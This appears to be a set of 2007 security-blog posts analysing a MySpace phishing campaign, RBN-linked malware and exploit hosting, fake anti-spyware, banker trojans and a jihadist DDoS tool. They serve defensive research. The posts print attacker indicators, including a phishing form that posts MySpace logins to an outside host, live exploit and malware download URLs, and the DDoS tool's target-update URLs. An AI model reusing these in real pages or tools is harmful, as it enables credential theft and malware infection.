Large Scale MySpace Phishing Attack

In need of a "creative phishing campaign of the year"? Try this, perhaps the largest phishing attack spoofing MySpace and collecting all the login details at a central location, that's been active for over a month and continues to be. A Chinese phishing group have come up with legitimate looking MySpace profiles (profile.myspace.com) in the form of subdomains at their original .cn domains, and by doing so achieve its ultimate objective - establish trust through typosquatting, remain beneath the security vendors radar by comment spamming the URLs inside MySpace, and obtain the login details of everyone who got tricked.

Key points :

- all of the participating domains are using identical DNS servers, whereas their DNS records are set to change every 3 minutes

- each and every domain is using a different comment spam message, making it easy to assess the potential impact of each of them

- the URLs are not spammed like typical phishing emails, but comment spammed within MySpace by using legitimate accouts, presumably once that have already fallen victim into the campaign, and mostly to remain beneath the radar of security vendors if the URLs were spammed in the usual manner

- all of the URLs are the subdomains are currently active, and the login details get forwarded to a central location 319303.cn/login.php

This how the fake MySpace login looks like on the fake domains/subdomains :

(form action = "http://319303.cn/login.php" method = "post" name = "theForm" id = "theForm)

This is how the real MySpace login looks like :

(form action = "http://secure.myspace.com/index.cfm?fuseaction=login.process" method = "post" id = "LoginForm")

Sample MySpace phishing URLs from this campaign :

profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn

profile.myspace.com.index.fuseaction.id.370913.cn

profile.myspace.com.fuseaction.id.0ed37i8xdd.125723.cn

profile.myspace.com.fuseaction.id.Dx78x00iJe5.982728.cn

profile.myspace.com.fuseaction.user.id.28902334.arutncbt.cn

profile.myspace.com.fuseaction.id.0nd8di8xfd.125723.cn

profile.myspace.com.fuseaction.id.0ed37i8xdd.109820.cn

Ten sample Chinese domains participating in the phishing attack, returning the MySpace spoof at the main index and the subdomains :

378d38.cn

978bg33.cn

370913.cn

107882.cn

103238.cn

978nd03.cn

107882.cn

pcc2ekxz.cn

125723.cn

pckeez.cn

Assessing the comment messages used on ten phishing domains for internal comment spamming at MySpace :

370913.cn - "haha i cant believe we went to high school with this girl"

978bg33.cn - "sometimes i cannot believe the pics people put on their myspaces"

982728.cn - "I cannot believe this freaking whore would put pics like that on her myspace page.. how trashy.."

977y62.cn - "did you see what happened? OMG you gotta see Mike's profile."

125723.cn - "did you see what happened? OMG you gotta see Mike's profile."

pckeez.cn - "can you believe we went to highschool with this chick?"

pcc2ekxz.cn - "can't believe a 18 year old chick would put half-nude pics on myspace. whore alert."

arutncbt.cn - "wow her brother is gonna be so pissed when he sees the pictures she put on her myspace"

125723.cn - "Did you hear what happened Omg you gotta see the profile.. So sad!"

109820.cn - "sometimes i just cannot believe the pics that people put on their myspaces LMAO!"

The campaign is surprisingly well thought of. If they were spamming the phishing URLs, security vendors would have picked it up immediately and its lifetime would have been much shorter compared to its current one. The phishers aren't sending emails asking people to login to MySpace via profile.myspace.com.random_digits.cn for instance, instead they're spamming inside MySpace by posting comments prompting users to click further using the phrase "haha i cant believe we went to high school with this girl". It gets even more interesting, compared to the common logic of them having to register fake accounts and posting the comments by using them, in this case, the three sample comments posted on Nov 2 2007 11:22 AM; Nov 4 2007 1:02 PM ; Nov 5 2007 8:47 AM; Nov 5 2007 9:33 PM, are all posted by legitime users, well from legitimate users' accounts in this case. How huge is this? Over 378,000 results for the campaign under this phrase keeping in mind that people embed their MySpace profiles at their domains, and 128,000 instances of a sample phishing domain (370913.cn) at MySpace.com itself. This is for one of the phishing domains only.

Now if that's not enough to disturb you, each and every of the .cn domains are resolving to what looks like U.S based hosts only that will change every 3 minutes. Not necessarily as dynamic as previously discussed fast-flux networks, but these are worth keeping an eye on :

107882.cn

370913.cn

978bg33.cn

Here are some central DNS servers that all the .cn domains use :

ns4.6309a46.com

ns1.52352a0c60a9c29.com

ns3.926817a885d86e1.com

ns2.terimadisirida.net

I'll leave the data mining based on these patterns to you, what's important is that the URLs are still serving spoofed MySpace front pages, with the only downsize that they cannot sucessfully load MySpace's videos, and don't provide any SSL authentication, which I doubt have prevented lots of people from falling victims into it.

Does all the data lead us to conclude that this could be the most "creative phishing campaign of the year"? Let's have it offline first. Continue reading →

The "New Media" Malware Gang

Since Possibility Media's Malware Fiasco, I've been successfully tracking the group behind the malware embedded attack at each and every online publication of Possibility Media. Successfully tracking mostly because of their lack of interest in putting any kind of effort of making them harder to trace back, namely, maintaining a static web presence, but one with diversifying set of malware and exploits used. Possibility Media's main IFRAME used was 208.72.168.176/e-Sr1pt2210/index.php, and at 208.72.168.176 we have a great deal of parked domains in standby mode such as :

repairhddtech.com
granddslp.net
prevedltd.net
stepling.net
softoneveryday.com
samsntafox.com
himpax.com
grimpex.org
trakror.org
dpsmob.com
besotrix.net
gotizon.net
besttanya.com
carsent.com
heliosab.info
gipperlox.info
leader-invest.net
fiderfox.info
potec.net

However, the latest IPs and domains related to the group are dispersed on different netblocks and are actively serving malware through exploit URLs :

78.109.16.242/us3/index.php
x-victory.ru/forum/index.php (85.255.114.170)
asechka.cn/traff/out.php (78.109.18.154)
trafika.info/stools/index.php (203.223.159.92)

What's so special about this group? It's the connection with the Russian Business Network. As I've already pointed out, the malware attack behind Possibility Media's was using IPs rented on behalf of RBN customers from their old netblock, here are two such examples of RBN IPs used by this group as well :

81.95.149.236/us3/index.php
81.95.148.162/e202/

In case you also remember, some of this group's URLs were also used as communication vehicle with a downloader that was hosted on a RBN IP, that very same RBN IP that was behind Bank of India's main IFRAME. Now that's a mutually beneficial malicious ecosystem for both sides. Here are more comments on other ecosystems. Continue reading →

But of Course I'm Infected With Spyware

Remember those old school fake hard drive erasers where a status bar that's basically doing a directory listing is shown, and HDD activity is stimulated so that the end user gets the false feeling of witnessing the process? Fake anti spyware and anti virus software, like the ones courtesy of the now fast-moving RBN, have been using this tactic for a while, and adding an additional layer of social engineering tricks by obtaining the PCs details with simple javascript. The folks behind online-scan.com; spyware.online-scan.com; antivirus.online-scan.com own a far more deceptive domain name compared to RBN's ones. In fact, even an anti virus vendor could envy them for not picking it up earlier and integrating it in upcoming marketing campaign or service to come. SpywareSoftStop's statements :

"At present the Internet is stuffed with viruses of any kind. Every PC is at risk and most probably IS infected. Anti-viruses can detect viruses only, but spyware, installed surreptitiously on a PC without the user's informed consent, is modified each day and solely particularized software can help to detect and remove it. However, a spyware program is rarely alone on a computer: an affected machine can rapidly be infected by many other components. In some infections, the spyware is not even evident; moreover, some types of spyware disable software firewalls and anti-virus software, and/or reduce browser security settings, thus opening the system to further opportunistic infections, much like an immune deficiency disease. Right now your system is going to be scanned and spyware, if any, will be detected."

The name servers preved.spywaresoftstop-support.com and medved.spywaresoftstop-support.com serve : spywaresoftstop.com; spywaresoftstop-cash.com; spywaresoftstop-support.com. The popup at online-scan.com that's now returning a 404 error for ldr.exe (downloadfilesldr.com/download/2/ldr.exe) will even appear if you try to close the window while your PC is "being scanned". What's ldr.exe? It's the default output of a DIY malware courtesy of Pinch.

Continue reading →

Lonely Polina's Secret

Just as I've been monitoring lots of spam that's using Geocities redirectors, yesterday Nicholas posted some details on a malware campaign using Geocities pages as redirectors, and Roderick Ordonez acknowledged the same. Original Geocities URLs used : geocities.com/MediciChavez7861 (active) ; geocities.com/IliseNkrumah2 (down) ; geocities.com/GounodNanon5 (down). Original message of the spam campaign :

"Hallo! Meine Name ist Polina. Ich bin Studentin und Ich habe zur Germany zu lernen angekommen . Ich suche mich den Freund und der Sex-Partner. Aller dass Ich will es ist ein guter Mann. Sie sollen ernst, sicher, klug sein. Geben Sie mich zu wissen wenn Sie wollen mit mir treffen. Ebenso konnen Sie einfach mein Freund sein. Sie konnen meine Fotos auf meiner Seite sehen: geocities.com/MediciChavez7861 BITTE, NURR DIE ERNSTE Vorschlages. KUSSE, POLINA"

The fake lonely German student Polina was also accessible from other URLs as well - ThePagesBargain.ru/polina; dibopservice.com, both now down as well as the main 58.65.238.36/polina URL which is forwarding to baby.com in an attempt to cover up the campaign -- you wish. Internal pages within the IP are still accessible - 58.65.238.36/index2_files/index3.htm; 58.65.238.36/index2_files/index.htm, and so is the malware itself - 58.65.238.36/iPIX-install.exe.

Malware campaigners are not just setting objectives and achieving them, they're also evaluating the results and drawing conclusions on how to improve the next campaign. Back in January, 2006, I emphasized on the emerging trend of localization in respect to malware, take for instance the release of a trojan in an open source form so that hacking groups from different countries could localize it by translating to their native language and making it even more easy to use, as well as the localization of MPack and IcePack malware kits to Chinese. In this campaign, a localized URL was also available targeting Dutch speaking visitors 58.65.238.36/polinanl, so you you have a German and Dutch languages included, and as we've seen the ongoing consolidation of malware authors and spammers serves well to both sides, spammers will on one hand segment all the German and Dutch emails, and the malware authors will mass mail using localized message templates. Great social engineering abusing a common stereotype that for instance German users were definitely flooded with English messages courtesy of Storm Worm targeting U.S citizens, which is like a Chinese user who's receiving a phishing email from the Royal Bank of Scotland - it's obvious both of these are easy to detect. Which is what localization is all about, the malware and spam speaks your local language. One downsize of this campaign is that Polina doesn't really look like a lonely German student, in fact she's a model and these are some of her portfolio shots.

Let's discuss how are the malware campaigners coming up with these Geocities accounts at the first place. Are the people behind the campaign manually registering them, outsourcing the registration process to someone else, or directly breaking the CAPTCHA? Could be even worse - they may be buying the already registered Geocities accounts from another group that's specializes in registering these, a group which like a previously covered concept of Proprietary Malware Tools is earning revenues based on higher profit margins given they don't distribute the product, but provide the service thereby keeping the automatic registration process know-how to themselves. Once the authentication details are known, the process of anything starting from blackhat SEO, direct spamming, malware hosting, and embedding such scripts, even IFRAMEs in a fully automated fashion.

Meanwhile, what are the chances there's another scammy ecosystem on the same netblock? But of course. vaichoau.com fake watches, pimpmovie.net malware C&C, urolicali.com.cn spammers, westernunion.reg-login.com a phishing url. Continue reading →

First Person Shooter Anti-Malware Game

Just when you think you've seen everything "evil marketers" can come up to both, consciously and subconsciously influence your purchasing behaviour and improve the favorability scale towards a company - you can still get surprised. After a decent example of the DIY marketing concept, Microsoft's perception of security as a "threat from outer space", an example of rebranding a security vendor, the Invible Burglar game, here comes another good example of new media marketering practice - while some companies seek to embed their logos into popular games, others are coming up with ones on their own. Symantec's Endpoint Protection Game - a first person shooter where the typically mutated creatures are replaces with viruses, spyware and rootkits is what I'm blogging about :

"Your task is to simply save your global network from viruses, worms, and a hideous host of online threats that are poised to take your IT infrastructure down."

Eye catching trailer as well. Such marketing campaigns can have a huge educational potential if they're, for instance, customized for a specific security awareness program module.

Continue reading →

Cyber Jihadist Blogs Switching Locations Again

Having had their blogs removed from Wordpress in a coordinated shutdown operation courtesy of the wisdom of the anti cyber jihadist crowd, The Ignored Puzzle Pieces of Knowledge and The Caravan of Martyrs have switched location to these URLs - inshallahshaheed.muslimpad.com; inshallahshaheed.acbox.com; caravanofmartyrs.muslimpad.com; ignoredknowledge.blogspot.com. Apparently there's an ongoing migration of cyber jihadist blogs from Wordpress to Muslimpads presumably with the idea to increase the time from a TOS abuse letter to shut down, if shut down ever occures given Muslimpad is significantly biased in removing such positioned as "free speech" communities given it's hosting provider is islamicnetwork.com. Should such propaganda be tolerated? This is where the different mandates of anti cyber jihadist organizations across the world contradict with each other. Some have a mandate to shut down such blogs and sites as soon as they come across such, others have a mandate to monitor and analyze these to keep in pace with emerging threats in the form of real-time intelligence, and in the near future other participants will have a mandate to infect such communities with malware ultimately targeting the cyber jihadists behind them or the visitors themselves.

The bottom line - the propaganda in the form of step-by-step video of an attack in question is a direct violation of their operational security (OPSEC) thereby providing the world's intelligence community with raw data on their warfare tactics. The propaganda's trade off is similar to that of the Dark Cyber Jihadist Web, while you may want to reach as many future recruits and "converts" as possible, you increase the chance of an intelligence analyst coming across your community, compared to closing it down to sorted and trustworthy individuals and therefore limiting the number of potential future jihadists. Inshallahshaheed are however, going for mass marketing with full speed, and in fact maintain a modest repository of videos at inshallahshaheed.vodpod.com. By the way, what's the difference between wishful thinking and thought crime? It's a threat that proves there's a positive ROI of your actions.

Related posts :
GIMF Switching Blogs
GIMF Now Permanently Shut Down
GIMF - "We Will Remain" Continue reading →

Popular Spammers Strategies and Tactics

It's been a while since I last participated with an article for WindowSecurity.com, so here it goes - Popular Spammers Strategies and Tactics :

"During 2007, spammers on a worldwide basis demonstrated their adaptability to the ongoing efforts anti-spam vendors put into ensuring their customers enjoy the benefits of having a spam-free inbox. What strategies do spammers use in order to achieve this? What tactics do they use in order to obtain email addresses, verify their validity, ensure they reach the highest number of receipts as possible in the shortest time span achievable, while making sure their spam campaigns remain virtually impossible to shut down?"

The article covers strategies and tactics such as : Redirectors/doorway pages; Rapid tactical warfare; Verification/confirmation of delivery; Consolidation; Outsourcing; and Affiliation based models. Continue reading →

Electronic Jihad's Targets List

Despite the fact that the Electronic Jihad 3.0 campaign was a futile attempt right from the very beginning, given the domains that were supposed to synchronize the targets to be attacked were down, it's interesting to try finding out who were they targeting at the first place? In the first campaigns, the URLs of the targets, not the victims since they couldn't scale enough to cause even partial damage, were obtainable via the web, compared to the third one where they were about to get synchronized. And since the synchronization URLs were down before we could take a peek, here are the targets URLs from the first two campaigns.

First campaign's targets list :
gov.il
keshmesh.net
meca-love4all.com
love4all.us

Second campaign's targets list :
love4all.us
islameyat.com
aldalil-walborhan.com
rapsaweyat.com
investigateislam.com
meca-me.org
ladeeni.net
meca-love4all.com

The attached table is the classificaton of the attacks, as site to be attacked, reason for the attack, importance, the results, and the site's status after tha attack, namely is it up and running or shut down completely, and how shutting it down would please God.

There's a saying that a person is judged by the type of enemies he has. If we apply it in this situation, you would see a bunch of inspired wannabe cyber jihadists whose biggest enemy is their idiocity at the first place. So, if these are the cyber jihadist enemies of yours - lucky you, and your critical infrastructure's integrity. Continue reading →

Scammy Ecosystem

In this example of a scammy ecosystem, you have a single IP (88.255.90.50) hosting the now, retro WebAttacker exploitation kit (inn2coming.com/income/index.php), a viagra scam (pctabletshop.hk) on the second parked domain, and an investment banking scams on another two - progold-inv.biz; cfinancialservice.com. Now, all they're missing is a Rock Phish kit hosted on it and it would have made it an even more interesting operation to monitor. Of course putting more personal efforsts into everything pays off. The same netblock is also hosting such popular downloader's update locations and live exploit URLs such as stat1count.net; all1count.net; and the recently appeared on the radar mediacount.net (88.255.90.253). Continue reading →

Teaching Cyber Jihadists How to Hack

Yet another indication of the emerging trend of building a knowledge-driven cyber jihadist community, are such online archives with localized to Arabic standard security and hacking research papers, ones you definitely came across to before, or may have in fact written by yourself. As I've already discussed this trend in previous posts, it's a PSYOPS strategy in action, one that's aiming to improve the overall perception of cyber jihadists' ability to wage their battles without using software and web services of their enemies. Whether the investment in time and resources is worth it is another topic, what's worth pointing out are the efforts they put into localizing the content in between adding the standard propaganda layer, and later on, building a community around it. Continue reading →

p0rn.gov - The Ongoing Blackhat SEO Operation

Want pr0n? Try .gov domains in general, ones that have been getting the attention of blackhat SEO-ers for a while, just like the most recent related cases where the City of Chetek, Winsonsin, the City of Somerset, Texas and Town of Norwood, Massachusetts got their blackhat SEO injection. The previous attack is related to the one I'll assess in this post, the blackhat SEO tool is the same given the static subdomains generated, what remains to be answered is how they've managed to get access to the control panels of the domains in order to add the subdomains? Let's look at the facts :

- the targets in this attack are The Virgin Islands Housing Finance Authority (VIHFA), and the City Of Selma, Alabama

- this is the second blackhat SEO operation uncovered during the past couple of months targeting .gov domains

- access to the control panels is somehow obtained so that subdomains pointing to 89.28.13.207 (89-28-13-207.starnet.md) and 89.28.13.195 (89-28-13-195.starnet.md) are added at both domains

- both .gov domains that are targets in this attack are using a shared hosting provider, meaning their IP reputation is in the hands of everyone else's web activities responding under the same IP

- no malware is served in this incident, compared to the previous one, a combination of malware and blackhat SEO

Subdomains at City of Selma currently hosting around 9000 blackhat SEO pages :

m21.selma-al.gov

m22.selma-al.gov

m23.selma-al.gov

m24.selma-al.gov

m25.selma-al.gov

m26.selma-al.gov

m27.selma-al.gov

m28.selma-al.gov

m29.selma-al.gov

m30.selma-al.gov

m31.selma-al.gov

m32.selma-al.gov

m33.selma-al.gov

m34.selma-al.gov

Subdomains at the Virgin Islands Housing Finance Authority with constantly changing structure :

a1.a.vihfa.gov

a2.a.vihfa.gov

a3.a.vihfa.gov

a4.a.vihfa.gov

a5.a.vihfa.gov

a6.a.vihfa.gov

a7.a.vihfa.gov

a8.a.vihfa.gov

a9.a.vihfa.gov

a10.a.vihfa.gov

Related subdomains now no longer responding :

2k110.x.vihfa.gov

2k106.x.vihfa.gov

j11.y.vihfa.gov

j9.y.vihfa.gov
z1.z.vihfa.gov

Where's the connection between this blackhat SEO operation and the previous one? It's not just that both subdomains at the different .gov's are responding to IPs from the same netblock, but also, 89.28.13.202 is responding to City of Somerset's subdomains from the previous incident such as : j6.y.somersettx.gov; st9.x.somersettx.gov; x.somersettx.gov.

Looks like someone in Moldova will get spanked for these incidents.

Continue reading →

Targeted Spamming of Bankers Malware

This particular incident is interesting mostly because we have a good example that once a site gets compromised the potential for abusing the access for malware distribution becomes very realistic, this is in fact what happened with autobroker.com.pl, as the following URLs were active as of yesterday, now down due to notification. Basically, the compromised host, compromised in an automatic and efficient way for sure, started acting as the foundation for the campaign, which as it looks like was spammed in a targetted manner. A tiny php file at autobroker.com.pl/l.php was launching the downloader :

TROJ.BANLOAD
Result: 18/31 (58.07%)
File size: 46080 bytes
MD5: 690e71077c9d78347368c6cf8752741e
SHA1: 7dedad0778a24c69d6df4c8ceedc94f20292473e

the downloader then drops the following bankers that are strangely hosted on the French site Opus Citatum, and are still active :

opuscitatum.com/modules/PHP%20Files/__steampw12318897_.exe

Trojan-Spy.Win32.Banker.ciy
Result: 9/32 (28.13%)
File size: 2498560 bytes
MD5: cee1fdea650487e0865a1b8831db1e73
SHA1: ad55ff3e5519d88b930d6a0a695e71fcc253351e

opuscitatum.com/modules/PHP%20Files/Ivete_Sangalo.scr

Trojan.PWS.Banker
Result: 13/32 (40.63%)
File size: 2505216 bytes
MD5: 1bdb0d3e13b93c76e50b93db1adeed3e
SHA1: f472693da81202f4322425b952ec02cbff8d72bc

The campaign was originally spammed with the messages : "Chegou 1 vivo foto torpedo" and "Vivo torpedo foi enviado de um celular para seu e" by using the web based spammer you can see in the attached screenshot.

More info about banking malware, comments on a recently advertised metaphisher malware kit with banker trojans infected hosts only showcasing the malicious economies of scale botnet masters mentality, as well as related posts on targeted malware attacks. Continue reading →

Yet Another Malware Outbreak Monitor

Such early warning security events systems always come as handy research tools for security analysts and reporters, and it's great to see that more and more vendors are continuing to share interactive threats data in real-time, type of data that used to be proprietary one several years ago. Commtouch's recently announced Malware Outbreak Center is another step in the right direction of intelligence data sharing, and building more transparency on emerging spam and malware outbreaks :

"The Commtouch Malware Outbreak Center displays a sample of email-borne malware that has recently been detected and blocked by Commtouch's Zero-Hour(TM) Virus Outbreak Protection solution. It also incorporates data from AV-Test.org, an independent third-party organization that tests most of the commercially available anti-virus scanners. This data enables the Center to publish comparative detection times for leading AV vendors, a first in this comprehensive format which includes malware variant checksum. Detection times are critical, since individual virus variants often peak and then nearly disappear, all in under three hours. IT managers now have access to an online tool that allows them to verify their AV vendor's performance for each new outbreak, and to download comparative data per malware variant."

Zero day DIY malware, and open source one undermine the reactive response time's model, but without anti virus signatures in 2007 your company and customers would still be getting infected by outdated Netsky samples - it's a fact, yet not the panacea of dealing with malware, and has never been. Another important issue that deserves to be discussed is the issue with the virus outbreak time of different vendors in Stormy Wormy times for instance. In the past, vendors were even using their detection in the wild, and on-the-fly binary obfuscation which in times of open source malware results in countless number of variants. Good PR is vital, and so is gaining competitive advatange in the minds of prospective customers by positioning the company among the first to have responded to the outbreak, but it raises the issue on the degree of exchanging malware samples between the vendors themselves, and the lack of transparency here. The way initiatives in the form of honeyfarms contributing hundreds of malware samples, and "wisdom of crowds" end users filling the gaps in reactive response indirectly protect millions of customers on behalf of anti virus software, in this very same way exchanging malware samples in the shortest possible time frame, ultimately benefits each and every customer and organization that's having an anti virus in its perimeter defense strategy.

A non-profit honeyfarm can collect hundreds of thousands of undetected malware samples in a single month, let's speculate that it could even outperform a small AV vendor's malware aggregation capabilities. In the anti virus industry, branding is crucial and therefore the non-profit honeyfarm cannot enter the market, instead, it's only incentive to donate the samples to the anti virus vendors is that of social responsibility. AVs should build more awareness on the importance of malware samples sharing among them, compared to pitching themselves as the vendor who first picked up the outbreak and protected its customers. Bargaining with someone's upcoming infection isn't that much of a success if you think about it. "Hey that signature is mine" days should have been over by now.

Moreover, it's a basic principle of every competitive market that the more competition, the more choices the customer would have, thereby making vendors innovate or cease to exist in irrelevance. Does the same apply to the anti virus market? Can we have a built-to-flip honeyfarm into an anti virus vendor to be later on acquired and integrated within a company's existing products portfolio? Let's hope not, and it's doubtful as there's a difference between an anti virus software and an "anti virus software", at least from the perspective that the second "anti virus software" may be occupying markets that could have otherwise been served by a better market proposition. Product development of an AV courtesy of a security vendor's products portfolio given the vendor realized that a huge percentage of security spending goes to perimeter defense solutions can be tricky, and even if acquisition has taken place you'd better stick to a company whose core competency is anti virus solutions.

Still Living in the Perimeter Defense World? Continue reading →

Go to Sleep, Go to Sleep my Little RBN

Yesterday, Paul Ferguson tipped me on the sudden disappearance of the Russian Business Network. And just like babies have different understanding of day and night, the RBN isn't interested in going to sleep too, in fact there's a speculation that they're relocating their infrastructure to China, speculation in terms of that it could be another such localized RBN operation :

"Jamz Yaneza, a Trend Micro research project manager, agreed. "We're seeing signs of RBN-like activity elsewhere, in Turkey, Taiwan and China. RBN may be moving to places even more inaccessible to the law [than Russia]. Everyone knows they were in St. Petersburg, but now they're changing houses, changing addresses. The Spamhaus Project antispam group has posted information that indicates RBN may have already laid claim to IP blocks located in China, Shanghai in particular."

It's always a pleasure to monitor the RBN, a single activity on behalf of their customers represents an entire sample to draw conclusions out of. Catch up with such activities like over 100 Malwares Hosted on a Single RBN IP, Fake Anti Virus and Anti Spyware Software, and the most recent Fake Suspended Account Messages while the IPs are alive and serving exploits and malware. Well, used to.

UPDATE: RBN - Russian Business Network, Chinese Web Space and Misdirection Continue reading →

Electronic Jihad v3.0 - What Cyber Jihad Isn't

It's intergalactic security statements like these that provoked me to do my most insightful research into the topic of what is cyber jihad, or what cyber jihad isn't. The news item on cyber jihadists coordinating a massive DDoS attack is a cyclical one, namely it reappears every quarter as it happened in August, and so I reviewed the tool, provided screenshots, and commented that while it's an aspirational initiative, with thankfully lame execution, it's not the coordinated DDoS attack executed in such way that should be feared, but cyber jihadists outsourcing the process. Despite that absolutely nothing has changed in respect to the way the program operates since v2.0, except that al-jinan.org changed to the now down al-jinan.net, the web is buzzing about the plans of wannabe cyber jihadists, the Al Ansar Hacking Team to be precise, to DDoS infidel sites on the 11th of November. Boo! Spooky - Al Qaeda cyber-jihad to begin Nov. 11; The e-Jihadists are coming, the e-Jihadists are coming!; Report: Al Qaeda to Launch Cyber-Attack on Nov. 11; Al-Qaeda Planning Cyber Attack?.

Key points :

- despite that the recommended DoS tool itself in the previous post is detected by almost all the anti virus vendors, in a people's information warfare situation, the participants will on purposely turn off their AVs to be able to use it

- the Electronic Jihad program is an example of poorly coded one, poorly in the sense of obtaining lists of the sites to be attacked from a single location, so you have a situation with 1000 wannabe cyber jihadists not being able to attack anyone in a coordinated manner given the host gets shut down

- the central update locations at the al-jinan.net domain are down, thank you Warintel, and so are the several others included, so you have a situation where forums and people start recommending the tool, they obtained it before the site was shut down, but couldn't get the targets to be attacked list

Time to assess the binary. The program archive's fingerprints as originally distributed :

File size: 358490 bytes

MD5: f38736dd16a5ef039dda940941bb2c0d

SHA1: 769157c6d3fe01aeade73a2de71e54e792047455

No AV detects this one.

E-Jihad.exe as the main binary

File size: 94208 bytes

MD5: caf858af42c3ec55be0e1cca7c86dde3

SHA1: f61fde991bfcc6096fa1278315cad95b1028cb4b

ClamAV - Flooder.VB-15

Panda - Suspicious file

Symantec - Hacktool.DoS

In a people's information warfare incident where the ones contributing bandwidth would on purposely shut down their AVs, does it really matter whether or not an perimeter defense solution detects it? It does from the perspective of wannabe cyber jihadists wanting to using their company's bandwidth for the purposely, an environment in which they are hopefully not being able to shut down the AV, thus forwarding the responsibility for the participation in the attack to their companies.

Al-jinan.org has been down since the Electronic Jihad Against Infidel Sites campaign became evident, the question is - where's the current DDoS campaign site? A mirror of the first campaign is available here - al-ansar.virtue.nu. Cached copy of al-jinan.net (202.71.104.200) is still available. Emails related to Al Ansar Hacking Group - the_crusaders_hell @ yahoo.com; the_crusaders_hell @ hotmail.com; al-ansar @ gooh.net Now the interesting part - where are Al-Jinan's new target synchronization URLs, and did they actually diversified them given that Al-Jinan.net is now down courtesy of what looks like Warintel's efforts? Partly. Here are the update URLs found within the binary :

al-jinan.net/ntarg.php?notdoing=yes

al-jinan.net/ntarg.php?howme=re

al-jinan.net/tlog.php?

al-jinan.net/tnewu.php?

arddra.host.sk/ntarg.php

jofpmuytrvcf.com/ntarg.php

jo-uf.net/ntarg.php

All are down, and jo-uf.net was among the domains used in the first version of the attack. If you think about it, even a wannabe botnet master will at least ensure the botnet's update locations are properly hardcoded within the malware. More details on jo-uf.net.

Let's discuss what cyber jihad isn't. Cyber jihad is anything but shutting down the critical infrastructure of a country in question, despite the potential for blockbuster movie scenario here. It's news stories like these, emphasizing on abusing the Internet medium for achieving their objectives in the form of recruitment, research, fund raising, propaganda, training, compared to wanting to shut it down. Logically, this is where all the investments go, because this is the most visible engagement point between a government and potential cyber terrorists - its critical infrastructure. I'm not saying don't invest in securing it, I'm just emphasizing on the fact that you should balance such spendings with the pragmatic reality which can be greatly described by using an analogy from the malware world, and how what used to be destructive viruses are now the types of malware interested in abusing your data, not destroying it.

The real threat does not come from wannabe cyber jihadists flooding a particular site in a coordinated manner, but from outsourcing the entire process to those who specialize in the service, or providing the infrastructure for it on demand. Now that's of course given they actually manage to keep up the update locations for longer than 24 hours, and achieve the mass effect of wannabe cyber jihadists using it all at once, the type of Dark Web Cyber Jihad trade-off.

Continue reading →

I See Alive IFRAMEs Everywhere

During the weekend, the entire Newsland.ru which is among the most popular Russian news portals, was marked as as "this site may harm your computer" by StopBadware.org due to an IFRAME embedded link pointing to where else if not to the RBN. Considering that each and every embedded malware attack during 2007 that I assessed in previous posts, had something to do with the RBN in the form of a single RBN IP which was used in numerous malicious activities all at once, different sites get embedded with it, blackhat SEO postings at different forums etc. in this one the parties behind the attack dedicated a special IP with what looks like as a clean IP reputation. A cached copy of the page will still load the live exploit url at 81.95.150.115/cgi-bin/in.cgi?p=user1 What really happened at Newsland.ru? Was it an end user who submitted a news story with the somehow embedded IFRAME to sort of conduct unethical competitive engagement by having Google mark the entire portal as harmful, or it was planned and executed on purposely?

In another such incident, Podfeed.net was recently hacked and malware embedded at its front page. The now clean site however, used to have an embedded link, over 20 times to be precise, pointing to the following URL :

yl18.net/0.js (125.65.77.25) with the .js having two IFRAMEs within, namely yl18.net/0.html - 404 dead, and the second IFRAME yl18.net/z.html which loads a third IFRAME within, pointing to yzgames.cn/game.htm (125.46.105.140). This IFRAME-ing game relies entirely on yl18.net/0.js to keep up and running, and a direct loading link to the script was also somehow embedded on high trafficked sites such as cincinnatiusa.com; cincinnati.com; guidance.nice.org.uk. Moreover, Maarten Van Horenbeeck at the ISC's blog has some detection rates while the malware was still active. This embedded malware campaign is a perfect example of an ongoing cover up, just like the case when several hours after the community started looking at the Bank of India's malware serving site and the RBN URL removed the javascript and redirected it to Google.com, and we had the same situation with the recent discovery of 100 malwares on a single RBN IP, where the directory name has changed several hours later for yet another time. The same is the situation withe the malicious parties behind Possibility Media's malware attack that once started getting visited by security vendors replaced all their main index page with a "get lost" message, as well as with RBN's fake "account suspended" messages which aren't really in a process of cover up, but in a deception stage like always.

While I was researching a third domain that was serving a Banking trojan, and loading IFRAMEs to sicil.info which in case you don't remember is the IFRAME behind the Syrian Embassy hack, I came across to injected blackhat SEO campaigns at two universities advertised in between the IFRAMEs, now removed, cached copies available - emissary.wm.edu/EE/cache; hsutx.edu/student_life/brand/wp-content/uploads. The reason I won't mention the domain in question is that the script kiddies behind it forgot to take care of their directory permissions just like the Russian Business Network did recently, and while in RBN's case over 100 malwares were spotted, in this case it's a web C&C for a metaphisher type of banking malware kit, namely Zeus. It gets even more interesting, as it appears that a Turkish defacer like the ones I blogged about yesterday is somehow connected with the group behind the recent Possibility Media's Attack, and the Syrian Embassy Hack as some of his IFRAMES are using the exact urls in the previous attacks. And you you already know while reading my previous assessments and the connections between them, one of the attack IP's in the Possibility Media's malware attack was also among the ones used in the Bank of India hack - it's the "ai siktir vee?" group with another unique IP.

Key points :

- a Turkish defacer is taking advantage of an remotely installed web backdoor in order to host a metaphisher type of banking malware kit
- the defacer is embedding iframes that were used in the Bank of India hack, the Syrian Embassy hack, and the recent Possibility Media's malware attack
- if defacers start cooperating with malware groups given each of them excels at different practices, it's gonna get very ugly

If you don't take care of your site's web vulnerability management, someone else will. Continue reading →

Overperforming Turkish Hacktivists

Last month's Turkish/Sweden hacktivism tensions surprised me mainly because the Swedes responded to the defacements in an entirely different way :

"On Saturday a group of disgruntled hackers posted a comment to the Flashback online forum linking to a stolen database containing thousands of user names and passwords from Turkish forum Ayyldz, the site thelocal.se reported on Tuesday. The Swedes also broke into the e-mail and MSN accounts of Turkish Web users and sent messages using the stolen identities. Among the images in circulation was a pornographic illustration of the Prophet Mohammed and Mustafa Kemal Ataturk, the founder of the modern Turkish state."

How do you keep track of defaced sites "courtesy" of Turkish script kiddies? Zone-h for sure, while in fact there're so many defacements done by Turkish hacking groups, that the hacktivists have localized the defacement achives into Turkish for better transparency, and by doing so it makes Turkish defacements during hacktivism wars much easier to keep track of. Who are the most active Turkish defacers anyway?

Top 5 Turkish Defacers at the first defacement mirror :

U-H-T - 8517
1923turk - 6711
hackpowerteam.org - 5364
By_CECEN - 5230
nadir_piero - 4440

Top 5 Turkish Defacers at the second defacement mirror :

Lonely.Antalya - 1101
Pit10 - 1000
beyrut-KaI3uS - 863
HEXB00T3R - 747
myturkx.org - 675

